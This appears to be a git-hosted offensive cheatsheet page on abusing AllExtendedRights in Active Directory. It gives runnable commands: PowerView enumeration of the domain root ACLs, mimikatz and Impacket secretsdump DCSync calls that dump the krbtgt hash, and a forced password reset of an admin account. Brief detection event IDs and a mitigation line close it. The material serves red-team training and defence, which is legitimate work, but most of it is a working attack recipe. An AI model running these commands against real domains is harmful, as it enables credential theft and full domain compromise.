daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-24-allextendedrights-dcsync-ace-abuse.md (4299B)


      1 ---
      2 title: "Attack #24 โ€” AllExtendedRights DCSync ACE Abuse"
      3 description: "AllExtendedRights is a blanket permission that grants every extended right on an AD object. When applied to the domain root object, this includes the twoโ€ฆ"
      4 category: active-directory
      5 subcategory: "ACL Abuse"
      6 tags: ["active-directory", "credential-access", "delegation"]
      7 tools: ["Impacket", "Mimikatz", "BloodHound", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/๐ŸŸก Attack #24 โ€” AllExtendedRights DCSync ACE Abuse.md"
     11 ---
     12 # ๐ŸŸก Attack #24 โ€” AllExtendedRights / DCSync ACE Abuse
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 `AllExtendedRights` is a blanket permission that grants **every extended right** on an AD object. When applied to the **domain root object**, this includes the two critical replication rights: `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` โ€” which is everything needed for DCSync. Unlike WriteDACL (where you ADD new ACEs), AllExtendedRights means you **already have** the DCSync permission implicitly โ€” you can immediately run DCSync without any DACL modification.
     19 
     20 This permission is also dangerous on user objects, where it grants `User-Force-Change-Password` (password reset) and `User-Change-Password` among other extended rights.
     21 
     22 ### AllExtendedRights Impact by Target
     23 
     24 | Target | Extended Rights Granted | Impact |
     25 |---|---|---|
     26 | **Domain root object** | DS-Replication-Get-Changes + All | Immediate DCSync capability |
     27 | **User object** | User-Force-Change-Password | Password reset without knowing current password |
     28 | **Computer object** | Various | Read LAPS password, modify delegation |
     29 | **Any object** | All extended rights for that object class | Full extended right access |
     30 
     31 ***
     32 
     33 ## โš™๏ธ Prerequisites
     34 
     35 | Requirement | Detail |
     36 |---|---|
     37 | **AllExtendedRights on domain root** | For DCSync โ€” check via BloodHound or PowerView |
     38 | **Domain user account** | The principal with AllExtendedRights |
     39 
     40 ***
     41 
     42 ## ๐Ÿ’ป Full Commands
     43 
     44 ### ๐Ÿ”ต Enumerate AllExtendedRights
     45 
     46 ```powershell
     47 # โ”€โ”€ Find who has AllExtendedRights on the domain root โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     48 Get-ObjectAcl "DC=corp,DC=local" -ResolveGUIDs | 
     49   Where-Object { $_.ActiveDirectoryRights -match "ExtendedRight" -and 
     50     $_.ObjectAceType -eq "00000000-0000-0000-0000-000000000000" } |
     51   ForEach-Object { 
     52     $_ | Add-Member -NotePropertyName Principal -NotePropertyValue (
     53       Convert-SidToName $_.SecurityIdentifier
     54     ) -PassThru
     55   } | Select-Object Principal, ActiveDirectoryRights
     56 # ObjectAceType of all zeros = AllExtendedRights
     57 ```
     58 
     59 ### ๐Ÿ”ด Immediate DCSync (No ACL Modification Needed)
     60 
     61 ```powershell
     62 # โ”€โ”€ If you have AllExtendedRights on domain root, just DCSync โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     63 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit
     64 ```
     65 
     66 ```bash
     67 # โ”€โ”€ Linux โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     68 secretsdump.py corp.local/low_user:'Password1'@DC01.corp.local -just-dc-user krbtgt
     69 # This works directly because AllExtendedRights = has replication rights
     70 ```
     71 
     72 ### ๐Ÿ”ด AllExtendedRights on User โ†’ Password Reset
     73 
     74 ```powershell
     75 Set-DomainUserPassword -Identity targetadmin -AccountPassword (
     76   ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
     77 )
     78 ```
     79 
     80 ***
     81 
     82 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     83 
     84 | Event ID | Source | What to Look For |
     85 |---|---|---|
     86 | **4662** | Security Log (DC) | Replication rights used โ€” same as DCSync detection |
     87 | **4724** | Security Log (DC) | Password reset (if used on user objects) |
     88 
     89 ***
     90 
     91 ## ๐Ÿ”— Attack Chain Context
     92 
     93 ```
     94 [AllExtendedRights] โ”€โ”€โ†’ Immediate DCSync or Password Reset
     95          โ”‚
     96          โ”œโ”€โ”€โ†’ ๐Ÿฉธ On domain root โ†’ DCSync without any ACL modification
     97          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ On user โ†’ password reset
     98          โ”œโ”€โ”€โ†’ ๐Ÿ”— Differs from WriteDACL: no need to ADD rights, you already HAVE them
     99          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: audit who has AllExtendedRights, limit to legitimate accounts
    100 ```
    101 
    102 ***
    103 
    104 > โœ… **Attack #24 โ€” AllExtendedRights Abuse complete.**